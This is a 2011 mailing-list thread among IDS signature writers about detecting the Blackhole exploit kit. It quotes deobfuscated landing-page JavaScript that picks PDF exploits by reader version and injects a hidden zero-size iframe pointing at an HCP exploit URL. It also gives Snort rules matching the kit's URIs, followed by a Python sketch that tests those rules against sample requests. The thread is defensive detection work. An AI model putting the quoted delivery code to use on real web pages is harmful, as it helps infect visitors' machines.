[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Chris Wakelin c.d.wakelin at reading.ac.uk
Mon Oct 3 10:32:42 EDT 2011


Hmm, looking at one from last week we have (thanks to my yucky decoder +
jsbeautifier.py):-

> function spl5() {
>     if (pdfver[0] > 0 && pdfver[0] < 8) {
>         show_pdf('./content/1fdp.php?f=22')
>     } else if ((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
>         show_pdf2('./content/2fdp.php?f=22')
>     }
>     spl6()
> }

(I've never seen a 1fdp.php download - perhaps it's too old an exploit now!)

> function spl6() {
>     try {
>         for (var i = 0, m; i < navigator.plugins.length; i++) {
>             var name = navigator.plugins[i].name;
>             if (name.indexOf('Media Player') != -1) {
>                 m = document.createElement('IFRAME');
>                 m.setAttribute('src', './content/pch2.php?c=22');
>                 m.setAttribute('width', 0);
>                 m.setAttribute('height', 0);
>                 document.body.appendChild(m)
>             }
>         }
>     } catch (e) {}
>     setTimeout(spl7, 1000)
> }

I'm not sure I've ever seen a pch2.php download either (other than by
me!), but I guess we could add detection for this?

Best Wishes,
Chris

On 03/10/11 15:13, Nathan wrote:
> On Mon, 03 Oct 2011 15:07:59 +0100 Chris Wakelin <c.d.wakelin at reading.ac.uk>
> wrote:
> 
>> Looking at the actual exploit kit, they're including the Java and PDF
>> exploits but not the Flash or HCP exploits (whatever HCP is?) at the moment.
> 
> It's the Help Control Protocol, another pseudo-protocol used by Win32,
> 'hcp://'.  There were a few vulnerabilities out for it and it looks like the
> exploit kits are leveraging it.  From what I recall I do have one up there for
> HCP in less than Media Player 10.0... I believe I wrote 2013077 so it may need
> some updating if the URI has changed.
> 
> http://blogs.technet.com/b/srd/archive/2010/06/10/help-and-support-center-vulnerability-full-disclosure-posting.aspx
> 
> emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media
> Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
> http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
> sid:2013077; rev:1;)
> 
> emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
> $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit";
> flow:established,to_server; content:"/pch.php?f="; http_uri;
> pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)
> 
> emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET 
> $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2";
> flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri;
> pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;
> rev:1;)
> 
> Thanks,
> Nathan
> 
> 


-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094
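As an added example (not from the thread and not part of the ET ruleset), the content + pcre logic of Nathan's three quoted rules, plus a hypothetical candidate for the pch2.php?c= iframe src in spl6(), applied to constructed request lines. It shows that the existing pch.php?f= rule does not cover pch2.php?c=, and that the trailing $ anchor stops matching as soon as the URI gains an extra parameter.

```python
import re

# Rules transcribed from the thread (content + pcre only); the last entry is a
# hypothetical candidate, not an ET rule, for the pch2.php?c=NN URI in spl6().
RULES = [
    {"sid": 2013077, "msg": "Blackhole Exploit Pack HCP overflow Media Player lt 10",
     "content": "/hcp_asx.php?f=", "pcre": r"/hcp_asx\.php\?f=\d+$"},
    {"sid": 2013548, "msg": "Blackhole Exploit Pack HCP exploit",
     "content": "/pch.php?f=", "pcre": r"/pch\.php\?f=\d+$"},
    {"sid": 2013549, "msg": "Blackhole Exploit Pack HCP exploit 2",
     "content": "/hcp_vbs.php?f=", "pcre": r"/hcp_vbs\.php\?f=\d+&d=\d+$"},
    {"sid": "CANDIDATE", "msg": "Blackhole landing pch2.php Media Player iframe",
     "content": "/pch2.php?c=", "pcre": r"/pch2\.php\?c=\d+$"},
]


def match_uri(uri):
    """Return the sids of rules whose content AND pcre both match the request URI.

    Mirrors the Snort semantics of the quoted rules: content is a literal
    prefilter on the http_uri buffer, pcre /U is then applied to the same buffer,
    and the trailing $ requires the URI to end right after the digits.
    """
    return [r["sid"] for r in RULES
            if r["content"] in uri and re.search(r["pcre"], uri)]


def scan_requests(lines):
    """Map each alerting URI in constructed 'METHOD URI VERSION' lines to its sids."""
    alerts = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        sids = match_uri(parts[1])
        if sids:
            alerts[parts[1]] = sids
    return alerts


# Constructed sample request lines, modelled on the URIs quoted in the thread.
SAMPLE_REQUESTS = [
    "GET /content/hcp_asx.php?f=17 HTTP/1.1",
    "GET /content/pch.php?f=22 HTTP/1.1",
    "GET /content/hcp_vbs.php?f=22&d=1 HTTP/1.1",
    "GET /content/pch2.php?c=22 HTTP/1.1",
    "GET /content/pch2.php?c=22&x=1 HTTP/1.1",  # extra parameter defeats the $ anchor
    "GET /index.php HTTP/1.1",
]
```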

